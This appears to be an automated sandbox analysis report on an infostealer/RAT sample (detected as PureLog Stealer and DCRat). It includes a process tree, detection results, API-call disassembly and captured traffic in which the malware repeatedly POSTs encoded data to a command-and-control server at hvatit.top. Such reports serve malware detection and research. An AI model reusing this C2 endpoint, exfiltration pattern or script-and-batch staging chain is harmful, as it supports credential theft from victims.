                                                        Aug 31, 2024 09:34:09.464436054 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        146192.168.2.44988480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:09.588500023 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:09.943098068 CEST2560OUTData Raw: 5a 54 5c 52 5a 5f 50 54 5d 5f 54 57 54 50 5b 53 5a 52 59 59 52 55 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZT\RZ_PT]_TWTP[SZRYYRUTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[32+9R5=;9?3^ ((0\(U$&<02V?(+.?!]'/Z,
                                                        Aug 31, 2024 09:34:10.284547091 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:10.415906906 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        147192.168.2.44988580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:10.537205935 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:10.898277044 CEST2560OUTData Raw: 5a 5e 5c 54 5a 5f 50 54 5d 5f 54 57 54 59 5b 50 5a 51 59 59 52 57 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^\TZ_PT]_TWTY[PZQYYRWT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[32B+:4!-4\9'["( S&9<P&6#[0)<;'X?;,!]'/Z,!
                                                        Aug 31, 2024 09:34:11.202346087 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:11.331969023 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        148192.168.2.44988680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:11.460190058 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:11.818041086 CEST2560OUTData Raw: 5a 5b 59 57 5a 59 50 54 5d 5f 54 57 54 51 5b 54 5a 56 59 5e 52 53 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z[YWZYPT]_TWTQ[TZVY^RSTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$1?(V#-#9,4];3*$;Y$.&W++\(</8?!]'/Z,
                                                        Aug 31, 2024 09:34:12.123125076 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:12.329957962 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        149192.168.2.44988780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:34:12.464144945 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:03:31:53
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\Desktop\cuAvoExY41.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\cuAvoExY41.exe"
                                                        Imagebase:0xfb0000
                                                        File size:2'278'706 bytes
                                                        MD5 hash:7DDACBFDACD9E8AEACD1B0F2DEA51F4E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1648685230.0000000006E22000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1648218136.000000000652A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:03:31:53
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe"
                                                        Imagebase:0x250000
                                                        File size:147'456 bytes
                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:03:31:57
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "
                                                        Imagebase:0x240000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:03:31:57
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:03:31:57
                                                        Start date:31/08/2024
                                                        Path:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"
                                                        Imagebase:0xb30000
                                                        File size:1'956'864 bytes
                                                        MD5 hash:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1685720678.0000000000B32000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 92%, ReversingLabs
                                                        • Detection: 55%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:03:31:59
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat"
                                                        Imagebase:0x7ff6a9b20000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:03:31:59
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:03:31:59
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff691f30000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:03:32:00
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff72f460000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:03:32:09
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe"
                                                        Imagebase:0x830000
                                                        File size:1'956'864 bytes
                                                        MD5 hash:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 92%, ReversingLabs
                                                        • Detection: 55%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:9.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:9.2%
                                                          Total number of Nodes:1517
                                                          Total number of Limit Nodes:43
                                                          execution_graph 25328 fd2cfb 38 API calls 4 library calls 25364 fb95f0 80 API calls 25389 fb5ef0 82 API calls 23398 fd98f0 23406 fdadaf 23398->23406 23402 fd9919 23403 fd990c 23403->23402 23414 fd9920 11 API calls 23403->23414 23405 fd9904 23415 fdac98 23406->23415 23409 fdadee TlsAlloc 23410 fdaddf 23409->23410 23422 fcfbbc 23410->23422 23412 fd98fa 23412->23405 23413 fd9869 20 API calls 2 library calls 23412->23413 23413->23403 23414->23405 23416 fdacc8 23415->23416 23419 fdacc4 23415->23419 23416->23409 23416->23410 23417 fdace8 23417->23416 23420 fdacf4 GetProcAddress 23417->23420 23419->23416 23419->23417 23429 fdad34 23419->23429 23421 fdad04 __dosmaperr 23420->23421 23421->23416 23423 fcfbc4 23422->23423 23424 fcfbc5 IsProcessorFeaturePresent 23422->23424 23423->23412 23426 fcfc07 23424->23426 23436 fcfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23426->23436 23428 fcfcea 23428->23412 23430 fdad55 LoadLibraryExW 23429->23430 23431 fdad4a 23429->23431 23432 fdad8a 23430->23432 23433 fdad72 GetLastError 23430->23433 23431->23419 23432->23431 23435 fdada1 FreeLibrary 23432->23435 23433->23432 23434 fdad7d LoadLibraryExW 23433->23434 23434->23432 23435->23431 23436->23428 23437 fdabf0 23438 fdabfb 23437->23438 23440 fdac24 23438->23440 23442 fdac20 23438->23442 23443 fdaf0a 23438->23443 23450 fdac50 DeleteCriticalSection 23440->23450 23444 fdac98 __dosmaperr 5 API calls 23443->23444 23445 fdaf31 23444->23445 23446 fdaf4f InitializeCriticalSectionAndSpinCount 23445->23446 23447 fdaf3a 23445->23447 23446->23447 23448 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23447->23448 23449 fdaf66 23448->23449 23449->23438 23450->23442 25329 fd88f0 7 API calls ___scrt_uninitialize_crt 25366 fcfd4f 9 API calls 2 library calls 25367 fbf1e8 FreeLibrary 23536 fb13e1 84 API calls 2 library calls 23537 fceae7 23538 fceaf1 23537->23538 23539 fce85d ___delayLoadHelper2@8 14 API calls 23538->23539 23540 fceafe 23539->23540 25331 fcf4e7 29 API calls _abort 23541 fcb7e0 23542 fcb7ea __EH_prolog 23541->23542 23709 fb1316 23542->23709 23545 fcbf0f 23788 fcd69e 23545->23788 23546 fcb82a 23547 fcb841 23546->23547 23549 fcb838 23546->23549 23550 fcb89b 23546->23550 23553 fcb83c 23549->23553 23554 fcb878 23549->23554 23552 fcb92e GetDlgItemTextW 23550->23552 23557 fcb8b1 23550->23557 23552->23554 23560 fcb96b 23552->23560 23553->23547 23565 fbe617 53 API calls 23553->23565 23554->23547 23561 fcb95f KiUserCallbackDispatcher 23554->23561 23555 fcbf38 23558 fcbf41 SendDlgItemMessageW 23555->23558 23559 fcbf52 GetDlgItem SendMessageW 23555->23559 23556 fcbf2a SendMessageW 23556->23555 23564 fbe617 53 API calls 23557->23564 23558->23559 23806 fca64d GetCurrentDirectoryW 23559->23806 23562 fcb974 23560->23562 23563 fcb980 GetDlgItem 23560->23563 23561->23547 23562->23554 23579 fcbe55 23562->23579 23567 fcb994 SendMessageW SendMessageW 23563->23567 23568 fcb9b7 SetFocus 23563->23568 23569 fcb8ce SetDlgItemTextW 23564->23569 23570 fcb85b 23565->23570 23567->23568 23572 fcb9c7 23568->23572 23588 fcb9e0 23568->23588 23573 fcb8d9 23569->23573 23828 fb124f SHGetMalloc 23570->23828 23571 fcbf82 GetDlgItem 23575 fcbf9f 23571->23575 23576 fcbfa5 SetWindowTextW 23571->23576 23578 fbe617 53 API calls 23572->23578 23573->23547 23582 fcb8e6 GetMessageW 23573->23582 23575->23576 23807 fcabab GetClassNameW 23576->23807 23583 fcb9d1 23578->23583 23580 fbe617 53 API calls 23579->23580 23584 fcbe65 SetDlgItemTextW 23580->23584 23582->23547 23586 fcb8fd IsDialogMessageW 23582->23586 23829 fcd4d4 23583->23829 23590 fcbe79 23584->23590 23586->23573 23592 fcb90c TranslateMessage DispatchMessageW 23586->23592 23593 fbe617 53 API calls 23588->23593 23589 fcc1fc SetDlgItemTextW 23589->23547 23595 fbe617 53 API calls 23590->23595 23592->23573 23594 fcba17 23593->23594 23597 fb4092 _swprintf 51 API calls 23594->23597 23631 fcbe9c _wcslen 23595->23631 23596 fcbff0 23600 fcc020 23596->23600 23603 fbe617 53 API calls 23596->23603 23602 fcba29 23597->23602 23598 fcc73f 97 API calls 23598->23596 23599 fcb9d9 23719 fba0b1 23599->23719 23605 fcc73f 97 API calls 23600->23605 23654 fcc0d8 23600->23654 23607 fcd4d4 16 API calls 23602->23607 23608 fcc003 SetDlgItemTextW 23603->23608 23612 fcc03b 23605->23612 23606 fcc18b 23613 fcc19d 23606->23613 23614 fcc194 EnableWindow 23606->23614 23607->23599 23616 fbe617 53 API calls 23608->23616 23609 fcba68 GetLastError 23610 fcba73 23609->23610 23725 fcac04 SetCurrentDirectoryW 23610->23725 23623 fcc04d 23612->23623 23651 fcc072 23612->23651 23619 fcc1ba 23613->23619 23847 fb12d3 GetDlgItem EnableWindow 23613->23847 23614->23613 23615 fcbeed 23618 fbe617 53 API calls 23615->23618 23620 fcc017 SetDlgItemTextW 23616->23620 23617 fcba87 23621 fcba90 GetLastError 23617->23621 23622 fcba9e 23617->23622 23618->23547 23626 fcc1e1 23619->23626 23636 fcc1d9 SendMessageW 23619->23636 23620->23600 23621->23622 23628 fcbb11 23622->23628 23633 fcbb20 23622->23633 23637 fcbaae GetTickCount 23622->23637 23845 fc9ed5 32 API calls 23623->23845 23624 fcc0cb 23627 fcc73f 97 API calls 23624->23627 23626->23547 23638 fbe617 53 API calls 23626->23638 23627->23654 23632 fcbd56 23628->23632 23628->23633 23630 fcc1b0 23848 fb12d3 GetDlgItem EnableWindow 23630->23848 23631->23615 23639 fbe617 53 API calls 23631->23639 23744 fb12f1 GetDlgItem ShowWindow 23632->23744 23640 fcbcfb 23633->23640 23642 fcbb39 GetModuleFileNameW 23633->23642 23643 fcbcf1 23633->23643 23634 fcc066 23634->23651 23636->23626 23726 fb4092 23637->23726 23646 fcb862 23638->23646 23647 fcbed0 23639->23647 23650 fbe617 53 API calls 23640->23650 23641 fcc169 23846 fc9ed5 32 API calls 23641->23846 23839 fbf28c 82 API calls 23642->23839 23643->23554 23643->23640 23646->23547 23646->23589 23655 fb4092 _swprintf 51 API calls 23647->23655 23659 fcbd05 23650->23659 23651->23624 23660 fcc73f 97 API calls 23651->23660 23652 fcbd66 23745 fb12f1 GetDlgItem ShowWindow 23652->23745 23653 fcbac7 23729 fb966e 23653->23729 23654->23606 23654->23641 23656 fbe617 53 API calls 23654->23656 23655->23615 23656->23654 23657 fcc188 23657->23606 23658 fcbb5f 23662 fb4092 _swprintf 51 API calls 23658->23662 23663 fb4092 _swprintf 51 API calls 23659->23663 23664 fcc0a0 23660->23664 23666 fcbb81 CreateFileMappingW 23662->23666 23667 fcbd23 23663->23667 23664->23624 23668 fcc0a9 DialogBoxParamW 23664->23668 23665 fcbd70 23746 fbe617 23665->23746 23671 fcbbe3 GetCommandLineW 23666->23671 23704 fcbc60 __InternalCxxFrameHandler 23666->23704 23681 fbe617 53 API calls 23667->23681 23668->23554 23668->23624 23674 fcbbf4 23671->23674 23673 fcbaed 23677 fcbaf4 GetLastError 23673->23677 23678 fcbaff 23673->23678 23840 fcb425 SHGetMalloc 23674->23840 23675 fcbc6b ShellExecuteExW 23699 fcbc88 23675->23699 23677->23678 23737 fb959a 23678->23737 23684 fcbd3d 23681->23684 23682 fcbd8c SetDlgItemTextW GetDlgItem 23685 fcbda9 GetWindowLongW SetWindowLongW 23682->23685 23686 fcbdc1 23682->23686 23683 fcbc10 23841 fcb425 SHGetMalloc 23683->23841 23685->23686 23751 fcc73f 23686->23751 23689 fcbc1c 23842 fcb425 SHGetMalloc 23689->23842 23691 fcc73f 97 API calls 23694 fcbddd 23691->23694 23693 fcbccb 23693->23643 23697 fcbce1 UnmapViewOfFile CloseHandle 23693->23697 23776 fcda52 23694->23776 23695 fcbc28 23843 fbf3fa 82 API calls 2 library calls 23695->23843 23697->23643 23699->23693 23702 fcbcb7 Sleep 23699->23702 23701 fcbc3f MapViewOfFile 23701->23704 23702->23693 23702->23699 23703 fcc73f 97 API calls 23707 fcbe03 23703->23707 23704->23675 23705 fcbe2c 23844 fb12d3 GetDlgItem EnableWindow 23705->23844 23707->23705 23708 fcc73f 97 API calls 23707->23708 23708->23705 23710 fb1378 23709->23710 23711 fb131f 23709->23711 23850 fbe2c1 GetWindowLongW SetWindowLongW 23710->23850 23712 fb1385 23711->23712 23849 fbe2e8 62 API calls 2 library calls 23711->23849 23712->23545 23712->23546 23712->23547 23715 fb1341 23715->23712 23716 fb1354 GetDlgItem 23715->23716 23716->23712 23717 fb1364 23716->23717 23717->23712 23718 fb136a SetWindowTextW 23717->23718 23718->23712 23722 fba0bb 23719->23722 23720 fba14c 23721 fba2b2 8 API calls 23720->23721 23723 fba175 23720->23723 23721->23723 23722->23720 23722->23723 23851 fba2b2 23722->23851 23723->23609 23723->23610 23725->23617 23889 fb4065 23726->23889 23730 fb9678 23729->23730 23731 fb96d5 CreateFileW 23730->23731 23732 fb96c9 23730->23732 23731->23732 23733 fb971f 23732->23733 23734 fbbb03 GetCurrentDirectoryW 23732->23734 23733->23673 23735 fb9704 23734->23735 23735->23733 23736 fb9708 CreateFileW 23735->23736 23736->23733 23738 fb95be 23737->23738 23743 fb95cf 23737->23743 23739 fb95ca 23738->23739 23740 fb95d1 23738->23740 23738->23743 23968 fb974e 23739->23968 23973 fb9620 23740->23973 23743->23628 23744->23652 23745->23665 23747 fbe627 23746->23747 23988 fbe648 23747->23988 23750 fb12f1 GetDlgItem ShowWindow 23750->23682 23752 fcc749 __EH_prolog 23751->23752 23753 fcbdcf 23752->23753 24011 fcb314 23752->24011 23753->23691 23756 fcb314 ExpandEnvironmentStringsW 23762 fcc780 _wcslen _wcsrchr 23756->23762 23757 fcca67 SetWindowTextW 23757->23762 23762->23753 23762->23756 23762->23757 23763 fcc855 SetFileAttributesW 23762->23763 23768 fccc31 GetDlgItem SetWindowTextW SendMessageW 23762->23768 23771 fccc71 SendMessageW 23762->23771 24015 fc1fbb CompareStringW 23762->24015 24016 fca64d GetCurrentDirectoryW 23762->24016 24018 fba5d1 6 API calls 23762->24018 24019 fba55a FindClose 23762->24019 24020 fcb48e 76 API calls 2 library calls 23762->24020 24021 fd3e3e 23762->24021 23765 fcc90f GetFileAttributesW 23763->23765 23775 fcc86f __cftof _wcslen 23763->23775 23765->23762 23767 fcc921 DeleteFileW 23765->23767 23767->23762 23769 fcc932 23767->23769 23768->23762 23770 fb4092 _swprintf 51 API calls 23769->23770 23772 fcc952 GetFileAttributesW 23770->23772 23771->23762 23772->23769 23773 fcc967 MoveFileW 23772->23773 23773->23762 23774 fcc97f MoveFileExW 23773->23774 23774->23762 23775->23762 23775->23765 24017 fbb991 51 API calls 2 library calls 23775->24017 23777 fcda5c __EH_prolog 23776->23777 24045 fc0659 23777->24045 23779 fcda8d 24049 fb5b3d 23779->24049 23781 fcdaab 24053 fb7b0d 23781->24053 23785 fcdafe 24069 fb7b9e 23785->24069 23787 fcbdee 23787->23703 23789 fcd6a8 23788->23789 24562 fca5c6 23789->24562 23792 fcd6b5 GetWindow 23793 fcbf15 23792->23793 23799 fcd6d5 23792->23799 23793->23555 23793->23556 23794 fcd6e2 GetClassNameW 24567 fc1fbb CompareStringW 23794->24567 23796 fcd76a GetWindow 23796->23793 23796->23799 23797 fcd706 GetWindowLongW 23797->23796 23798 fcd716 SendMessageW 23797->23798 23798->23796 23800 fcd72c GetObjectW 23798->23800 23799->23793 23799->23794 23799->23796 23799->23797 24568 fca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23800->24568 23802 fcd743 24569 fca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23802->24569 24570 fca80c 8 API calls 23802->24570 23805 fcd754 SendMessageW DeleteObject 23805->23796 23806->23571 23808 fcabcc 23807->23808 23809 fcabf1 23807->23809 24573 fc1fbb CompareStringW 23808->24573 23811 fcabff 23809->23811 23812 fcabf6 SHAutoComplete 23809->23812 23815 fcb093 23811->23815 23812->23811 23813 fcabdf 23813->23809 23814 fcabe3 FindWindowExW 23813->23814 23814->23809 23816 fcb09d __EH_prolog 23815->23816 23817 fb13dc 84 API calls 23816->23817 23818 fcb0bf 23817->23818 24574 fb1fdc 23818->24574 23821 fcb0d9 23823 fb1692 86 API calls 23821->23823 23822 fcb0eb 23824 fb19af 128 API calls 23822->23824 23825 fcb0e4 23823->23825 23827 fcb10d __InternalCxxFrameHandler ___std_exception_copy 23824->23827 23825->23596 23825->23598 23826 fb1692 86 API calls 23826->23825 23827->23826 23828->23646 24582 fcb568 PeekMessageW 23829->24582 23832 fcd536 SendMessageW SendMessageW 23834 fcd591 SendMessageW SendMessageW SendMessageW 23832->23834 23835 fcd572 23832->23835 23833 fcd502 23836 fcd50d ShowWindow SendMessageW SendMessageW 23833->23836 23837 fcd5c4 SendMessageW 23834->23837 23838 fcd5e7 SendMessageW 23834->23838 23835->23834 23836->23832 23837->23838 23838->23599 23839->23658 23840->23683 23841->23689 23842->23695 23843->23701 23844->23562 23845->23634 23846->23657 23847->23630 23848->23619 23849->23715 23850->23712 23852 fba2bf 23851->23852 23853 fba2e3 23852->23853 23854 fba2d6 CreateDirectoryW 23852->23854 23872 fba231 23853->23872 23854->23853 23858 fba316 23854->23858 23856 fba329 GetLastError 23859 fba325 23856->23859 23858->23859 23864 fba4ed 23858->23864 23859->23722 23862 fba2ff 23862->23856 23863 fba303 CreateDirectoryW 23862->23863 23863->23856 23863->23858 23879 fcec50 23864->23879 23867 fba53d 23867->23859 23868 fba510 23869 fbbb03 GetCurrentDirectoryW 23868->23869 23870 fba524 23869->23870 23870->23867 23871 fba528 SetFileAttributesW 23870->23871 23871->23867 23881 fba243 23872->23881 23875 fbbb03 23876 fbbb10 _wcslen 23875->23876 23877 fbbbb8 GetCurrentDirectoryW 23876->23877 23878 fbbb39 _wcslen 23876->23878 23877->23878 23878->23862 23880 fba4fa SetFileAttributesW 23879->23880 23880->23867 23880->23868 23882 fcec50 23881->23882 23883 fba250 GetFileAttributesW 23882->23883 23884 fba23a 23883->23884 23885 fba261 23883->23885 23884->23856 23884->23875 23886 fbbb03 GetCurrentDirectoryW 23885->23886 23887 fba275 23886->23887 23887->23884 23888 fba279 GetFileAttributesW 23887->23888 23888->23884 23890 fb407c __vsnwprintf_l 23889->23890 23893 fd5fd4 23890->23893 23896 fd4097 23893->23896 23897 fd40bf 23896->23897 23898 fd40d7 23896->23898 23913 fd91a8 20 API calls __dosmaperr 23897->23913 23898->23897 23899 fd40df 23898->23899 23915 fd4636 23899->23915 23902 fd40c4 23914 fd9087 26 API calls __cftof 23902->23914 23906 fcfbbc 